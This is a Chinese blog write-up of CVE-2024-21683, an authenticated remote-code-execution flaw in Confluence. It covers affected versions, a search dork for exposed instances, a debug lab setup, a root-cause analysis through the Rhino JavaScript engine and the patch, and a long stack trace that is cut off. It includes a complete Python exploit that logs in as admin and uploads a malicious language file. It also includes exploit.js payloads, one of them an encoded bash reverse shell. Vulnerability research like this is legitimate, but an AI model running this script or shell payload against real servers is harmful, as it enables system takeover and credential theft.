Confluence认证后RCE(CVE-2024-21683)

admin 2025年1月20日12:40:04评论5 views字数 54343阅读181分8秒阅读模式
 

Confluence介绍

Confluence 是一款由 Atlassian 开发的协作软件,主要用于团队内部的信

Confluence 通常被用于企业环境中,以提高团队的生产力和沟通效率。

漏洞概述

Confluence是Atlassian开发的一款团队协作软件,用于帮助团队成员共享知识、协作文档和管理项目。

Confluence 允许经过身份验证的攻击者执行任意代码,可能导致完全系统接管、部署恶意软件、系统配置更改和登录凭据窃取。

漏洞影响版本

● 8.9.0

● 8.8.0 to 8.8.1

● 8.7.1 to 8.7.2

● 8.6.0 to 8.6.2

● 8.5.0 to 8.5.8 (LTS)

● 8.4.0 to 8.4.5

● 8.3.0 to 8.3.4

● 8.2.0 to 8.2.3

● 8.1.0 to 8.1.4

● 8.0.0 to 8.0.4

● 7.20.0 to 7.20.3

● 7.19.0 to 7.19.21 (LTS)

资产测绘平台Dork

app="ATLASSIAN-Confluence"
环境搭建

本文使用vulhub的# CVE-2023-22527,vulhub之前提供的docker-compose没有开放远程debug,改一下,首先添加一个映射端口

version: '2'services:  web:    image: vulhub/confluence:8.5.3    ports:      - "8090:8090"      - "5050:5050"    depends_on:      - db  db:    image: postgres:15.4-alpine    environment:    - POSTGRES_PASSWORD=postgres    - POSTGRES_DB=confluence
docker-compose up -d #启动容器后进入容器,执行命令:sed -i '/export CATALINA_OPTS/iCATALINA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5050 ${CATALINA_OPTS}"/opt/atlassian/confluence/bin/setenv.sh# 接着执行docker-compose restart#具体安装请参考vulhub,安装完毕靶机就OK了。#然后去 https://www.atlassian.com/zh/software/confluence/download-archives#下一个8.5.3的zip包,解压,idea打开
Confluence认证后RCE(CVE-2024-21683)

把这些都添加为库,接着配置一个远程debug

Confluence认证后RCE(CVE-2024-21683)

这里调试环境也搭建好了

漏洞复现

脚本梭哈参考:

https://github.com/W01fh4cker/CVE-2024-21683-RCE

python .CVE-2024-21683.py -u http://127.0.0.1:8090/ -au admin -ap admin -f exploit.js -n test
import argparseimport osimport requestsfrom bs4 import BeautifulSoupdefGeyAltToken(url, proxy, session):    headers = {"User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    alttoken_url = f"{url}/admin/plugins/newcode/configure.action"    resp = session.get(url=alttoken_url, headers=headers, verify=False, proxies=proxy, timeout=20)if"atlassian-token"in resp.text:        soup = BeautifulSoup(resp.text, 'html.parser')        meta_tag = soup.find('meta', {'id''atlassian-token''name''atlassian-token'})if meta_tag:            content_value = meta_tag.get('content')return content_valueelse:print("Meta tag not found")defLoginAsAdministrator(session, url, proxy, username, password):    login_url = url + "/dologin.action"    headers = {"User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36","Content-Type""application/x-www-form-urlencoded"    }    data = f"os_username={username}&os_password={password}&login=%E7%99%BB%E5%BD%95&os_destination=%2F"    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)defDoAuthenticate(session, url, proxy, password, alt_token):    login_url = url + "/doauthenticate.action"    headers = {"User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36","Content-Type""application/x-www-form-urlencoded"    }    data = f"atl_token={alt_token}&password={password}&authenticate=%E7%A1%AE%E8%AE%A4&destination=/admin/viewgeneralconfig.action"    session.post(url=login_url, headers=headers, data=data, proxies=proxy, verify=False, timeout=20)defUploadEvilJsFile(session, url, proxy, jsFilename, jsFileContent, alt_token):    url = f"{url}/admin/plugins/newcode/addlanguage.action"    data = {"atl_token": alt_token,"newLanguageName""test"    }    files = {"languageFile": (        jsFilename, jsFileContent, "text/javascript")    }    headers = {"User-Agent""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    session.post(url, headers=headers, data=data, files=files, verify=False, proxies=proxy, timeout=20)defParseArgs():    parser = argparse.ArgumentParser(description="CVE-2024-21683-RCE")    parser.add_argument("-u""--url"type=strhelp="target url to check, eg: http://192.168.198.1:8090", required=True)    parser.add_argument("-p""--proxy"type=str, default="http://127.0.0.1:8083"help="proxy url, eg: http://127.0.0.1:8083", required=False)    parser.add_argument("-au""--admin-username"type=strhelp="The username of the user who is in the Administrators group", required=True)    parser.add_argument("-ap""--admin-password"type=strhelp="The password of the user who is in the Administrators group", required=True)    parser.add_argument("-f""--file"type=strhelp="exploit file", default="exploit.js", required=True)    parser.add_argument("-n""--name"type=strhelp="newLanguageName", default="test", required=True)return parser.parse_args()if __name__ == '__main__':    args = ParseArgs()# 这里不管传不传-p都会加上代理,所以改了    proxy = {}    session = requests.session()    jsfn = os.path.basename(args.file)    jsfc = open(args.file, "r", encoding="utf-8").read()    LoginAsAdministrator(session, args.url.strip("/"), proxy, args.admin_username, args.admin_password)    alt_token = GeyAltToken(args.url.strip("/"), proxy, session)    DoAuthenticate(session, args.url.strip("/"), proxy, args.admin_password, alt_token)    UploadEvilJsFile(session, args.url.strip("/"), proxy, jsfn, jsfc, alt_token)
exploit.js
// new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()// 由于是docker起的,这里创建文件为演示new java.lang.ProcessBuilder["(java.lang.String[])"](["bash""-c","touch /tmp/succ"]).start()// 反弹shell如下new java.lang.ProcessBuilder["(java.lang.String[])"](["bash""-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTEyMjMgMD4mMQ==}|{base64,-d}|{bash,-i}"]).start();
Confluence认证后RCE(CVE-2024-21683)

手动的话就,登录后台 -- 站点管理 -- 配置代码宏

Confluence认证后RCE(CVE-2024-21683)

把上面的 js 传进去即可,前端显示什么不用管,实际已经成功执行

漏洞分析

confluence补丁是带版本号的,idea直接diff看不出来,写个脚本去掉版本号

import os  import shutil  defmain():      confluence_lib_path = r"D:atlassian-confluence-8.5.3atlassian-confluence-8.5.3confluenceWEB-INF"    lib_path = rf"{confluence_lib_path}atlassian-bundled-plugins"    no_version_lib_path = rf"{confluence_lib_path}no_version_" + lib_path.split('\')[-1]  ifnot os.path.exists(no_version_lib_path):          os.mkdir(no_version_lib_path)  for root, dirs, files in os.walk(lib_path):  for old_filename in files:              version = old_filename.split('-')[-1]              new_filename = old_filename.replace(f'-{version}''') + '.' + old_filename.split('.')[-1]              shutil.copyfile(rf'{lib_path}{old_filename}'rf'{no_version_lib_path}{new_filename}')  if __name__ == '__main__':      main()

新版的也运行一个就可以了,然后使用idea对比代码。根据官方披露:

[CONFSERVER-95832] RCE (Remote Code Execution) in Confluence Data Center and Server - Create and track feature requests for Atlassian products.

https://jira.atlassian.com/browse/CONFSERVER-95832

可知路由为admin/plugins/newcode/addlanguage.action,jar 包:newcode-macro-plugin-17.19.3.jar

Confluence认证后RCE(CVE-2024-21683)

com.atlassian.confluence.ext.code.languages.impl.RhinoLanguageParser#parseLanguage打断

Confluence认证后RCE(CVE-2024-21683)

这里拼接了上传的js,结果为

var brushName;var brushAliases;varSyntaxHighlighter = function() { var sh = {brushes : {},readBrushes : function () {//Find all brushesfor (var brush in SyntaxHighlighter.brushes) {brushAliases = SyntaxHighlighter.brushes[brush].aliases;brushName = "" + brush;}}}sh.Highlighter = function(){};return sh;}();new java.lang.ProcessBuilder["(java.lang.String[])"](["bash", "-c","touch /tmp/succ"]).start()SyntaxHighlighter.readBrushes();

跟到org.mozilla.javascript.Context#compileImpl

Confluence认证后RCE(CVE-2024-21683)
Confluence认证后RCE(CVE-2024-21683)

将 js 转为 ast

Confluence认证后RCE(CVE-2024-21683)

继续往下,这里进去

Confluence认证后RCE(CVE-2024-21683)

将 js 转为 字节码。走啊走,跟到org.mozilla.javascript.optimizer.Codegen#createScriptObject

Confluence认证后RCE(CVE-2024-21683)

实例化刚才转的类

Confluence认证后RCE(CVE-2024-21683)

最后走到org.mozilla.javascript.Context#evaluateString进行调用。

补丁修复是Scriptable scope = cx.initSafeStandardObjects((ScriptableObject)null, true);initSafeStandardObjects通过创建一个没有危险功能的标准对象来限制代码执行。

整个堆栈为:

evaluateString:1136, Context (org.mozilla.javascript), Context.javaparseLanguage:79, RhinoLanguageParser (com.atlassian.confluence.ext.code.languages.impl), RhinoLanguageParser.javaparseRegisteredLanguage:121, RhinoLanguageParser (com.atlassian.confluence.ext.code.languages.impl), RhinoLanguageParser.javainstallLanguage:61, RegisteredLanguageInstallerImpl (com.atlassian.confluence.ext.code.languages.impl), RegisteredLanguageInstallerImpl.javaaddLanguage:206, ConfigureNewcodeAction (com.atlassian.confluence.ext.code.config), ConfigureNewcodeAction.javainvoke0:-1, NativeMethodAccessorImpl (jdk.internal.reflect), NativeMethodAccessorImpl.javainvoke:62, NativeMethodAccessorImpl (jdk.internal.reflect), NativeMethodAccessorImpl.javainvoke:43, DelegatingMethodAccessorImpl (jdk.internal.reflect), DelegatingMethodAccessorImpl.javainvoke:566, Method (java.lang.reflect), Method.javainvokeMethodInsideSandbox:1266, OgnlRuntime (ognl), OgnlRuntime.javainvokeMethod:1251, OgnlRuntime (ognl), OgnlRuntime.javacallAppropriateMethod:1969, OgnlRuntime (ognl), OgnlRuntime.javacallMethod:68, ObjectMethodAccessor (ognl), ObjectMethodAccessor.javacallMethodWithDebugInfo:98, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor), XWorkMethodAccessor.javacallMethod:90, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor), XWorkMethodAccessor.javacallMethod:2045, OgnlRuntime (ognl), OgnlRuntime.javagetValueBody:97, ASTMethod (ognl), ASTMethod.javaevaluateGetValueBody:212, SimpleNode (ognl), SimpleNode.javagetValue:258, SimpleNode (ognl), SimpleNode.javagetValue:537, Ognl (ognl), Ognl.javagetValue:501, Ognl (ognl), Ognl.javaexecute:531, OgnlUtil$3 (com.opensymphony.xwork2.ognl), OgnlUtil.javacompileAndExecuteMethod:583, OgnlUtil (com.opensymphony.xwork2.ognl), OgnlUtil.javacallMethod:529, OgnlUtil (com.opensymphony.xwork2.ognl), OgnlUtil.javainvokeAction:438, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javainvokeActionOnly:293, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javainvoke:254, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javadoIntercept:181, DefaultWorkflowInterceptor (com.opensymphony.xwork2.interceptor), DefaultWorkflowInterceptor.javaintercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.javaintercept:25, ConfluenceWorkflowInterceptor (com.atlassian.confluence.core), ConfluenceWorkflowInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javadoIntercept:263, ValidationInterceptor (com.opensymphony.xwork2.validator), ValidationInterceptor.javaintercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:44, CaptchaInterceptor (com.atlassian.confluence.security.interceptors), CaptchaInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:117, XsrfTokenInterceptor (com.atlassian.xwork.interceptors), XsrfTokenInterceptor.javaintercept:30, ConfluenceXsrfTokenInterceptor (com.atlassian.confluence.xwork), ConfluenceXsrfTokenInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:74, ConfluenceLicenseInterceptor (com.atlassian.confluence.core), ConfluenceLicenseInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:23, HttpRequestStatsInterceptor (com.atlassian.confluence.xwork), HttpRequestStatsInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:38, MessageHolderInterceptor (com.atlassian.confluence.validation), MessageHolderInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:19, EventPublisherInterceptor (com.atlassian.confluence.event), EventPublisherInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:43, LoggingContextInterceptor (com.atlassian.confluence.util), LoggingContextInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:21, CancellingInterceptor (com.atlassian.confluence.core), CancellingInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:122, RestrictHttpMethodInterceptor (com.atlassian.xwork.interceptors), RestrictHttpMethodInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:60, WebSudoInterceptor (com.atlassian.confluence.security.websudo), WebSudoInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:37, ThemeContextInterceptor (com.atlassian.confluence.themes), ThemeContextInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:97, PermissionCheckInterceptor (com.atlassian.confluence.security.actions), PermissionCheckInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:19, BootstrapAwareInterceptor (com.atlassian.confluence.setup.struts), BootstrapAwareInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javadoIntercept:175, PrepareInterceptor (com.opensymphony.xwork2.interceptor), PrepareInterceptor.javaintercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:50, UserAwareInterceptor (com.atlassian.confluence.user.actions), UserAwareInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:37, CommentAwareInterceptor (com.atlassian.confluence.pages.actions), CommentAwareInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:49, PageAwareInterceptor (com.atlassian.confluence.pages.actions), PageAwareInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:70, SpaceAwareInterceptor (com.atlassian.confluence.spaces.actions), SpaceAwareInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:30, ConfluenceAccessInterceptor (com.atlassian.confluence.security.interceptors), ConfluenceAccessInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:21, FlashScopeInterceptor (com.atlassian.confluence.xwork), FlashScopeInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:167, ServletConfigInterceptor (org.apache.struts2.interceptor), ServletConfigInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:27, LastModifiedInterceptor (com.atlassian.confluence.core.actions), LastModifiedInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:44, ConfluenceAutowireInterceptor (com.atlassian.confluence.core), ConfluenceAutowireInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javadoIntercept:140, ParametersInterceptor (com.opensymphony.xwork2.interceptor), ParametersInterceptor.javaintercept:99, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor), MethodFilterInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javainvokeAndHandleExceptions:63, TransactionalInvocation (com.atlassian.xwork.interceptors), TransactionalInvocation.javainvokeInTransaction:53, TransactionalInvocation (com.atlassian.xwork.interceptors), TransactionalInvocation.javaintercept:50, XWorkTransactionInterceptor (com.atlassian.xwork.interceptors), XWorkTransactionInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:60, SetupIncompleteInterceptor (com.atlassian.confluence.xwork), SetupIncompleteInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:26, SecurityHeadersInterceptor (com.atlassian.confluence.security.interceptors), SecurityHeadersInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaintercept:16, XWorkProfilingInterceptor (com.atlassian.xwork.interceptors), XWorkProfilingInterceptor.javainvoke:249, DefaultActionInvocation (com.opensymphony.xwork2), DefaultActionInvocation.javaexecute:48, StrutsActionProxy (org.apache.struts2.factory), StrutsActionProxy.javaserviceAction:106, ConfluenceStrutsDispatcher (com.atlassian.confluence.impl.struts), ConfluenceStrutsDispatcher.javaexecuteAction:79, ExecuteOperations (org.apache.struts2.dispatcher), ExecuteOperations.javadoFilter:77, StrutsExecuteFilter (org.apache.struts2.dispatcher.filter), StrutsExecuteFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:52, IncludeResourcesFilter (com.atlassian.confluence.plugins.baseurl), IncludeResourcesFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:36, BotKillerFilter (com.atlassian.labs.botkiller), BotKillerFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:24, ContextFilter (com.atlassian.applinks.core.rest.context), ContextFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:75, PulpFilter (com.atlassian.confluence.plugins.pulp), PulpFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:75, UniversalAnalyticsFilter (com.atlassian.analytics.client.filter), UniversalAnalyticsFilter.javadoFilter:33, AbstractHttpFilter (com.atlassian.analytics.client.filter), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:32, ServingRequestsFilter (com.atlassian.mywork.client.filter), ServingRequestsFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:77, OnboardingFilter (com.atlassian.confluence.efi), OnboardingFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilterInternal:101, ConfluenceAuthenticationFilter (com.atlassian.plugins.authentication.impl.web.filter.authentication), ConfluenceAuthenticationFilter.javadoFilter:29, AbstractJohnsonAwareFilter (com.atlassian.plugins.authentication.impl.web.filter), AbstractJohnsonAwareFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:32, PrettyUrlsSiteMeshFixupFilter (com.atlassian.prettyurls.filter), PrettyUrlsSiteMeshFixupFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:55, PrettyUrlsDispatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsDispatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:80, PrettyUrlsSiteMeshFilter (com.atlassian.prettyurls.filter), PrettyUrlsSiteMeshFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:51, PrettyUrlsMatcherFilter (com.atlassian.prettyurls.filter), PrettyUrlsMatcherFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:72, MobileAppWebViewFilter (com.atlassian.confluence.plugins.mobile.filter), MobileAppWebViewFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javadoFilter:56, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:44, ServletFilterModuleContainerFilter (com.atlassian.plugin.servlet.filter), ServletFilterModuleContainerFilter.javadoFilter:50, JohnsonServletFilterModuleContainerFilter (com.atlassian.johnson.plugin.servlet.filter), JohnsonServletFilterModuleContainerFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:64, MessagesDecoratorFilter (com.atlassian.confluence.util.message), MessagesDecoratorFilter.javadoFilter:32, AbstractHttpFilter (com.atlassian.core.filters), AbstractHttpFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javaobtainContent:181, SiteMeshFilter (com.opensymphony.sitemesh.webapp), SiteMeshFilter.javadoFilter:85, SiteMeshFilter (com.opensymphony.sitemesh.webapp), SiteMeshFilter.javadoFilter:48, ProfilingSiteMeshFilter (com.atlassian.confluence.util.profiling), ProfilingSiteMeshFilter.javainternalDoFilter:178, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:153, ApplicationFilterChain (org.apache.catalina.core), ApplicationFilterChain.javadoFilter:39, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:46, ReadWriteScopeFilter (com.atlassian.oauth2.scopes.web), ReadWriteScopeFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:37, IteratingFilterChain (com.atlassian.plugin.servlet.filter), IteratingFilterChain.javalambda$doFilter$0:57, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), DelegatingPluginFilter.javadoFilter:-11042570324 (com.atlassian.plugin.servlet.filter.DelegatingPluginFilter$$Lambda$2637), Unknown SourcedoFilter:46, AbstractThreadNamingFilter (com.atlassian.troubleshooting.thready.filter), AbstractThreadNamingFilter.javadoFilter:62, DelegatingPluginFilter (com.atlassian.plugin.servlet.filter), 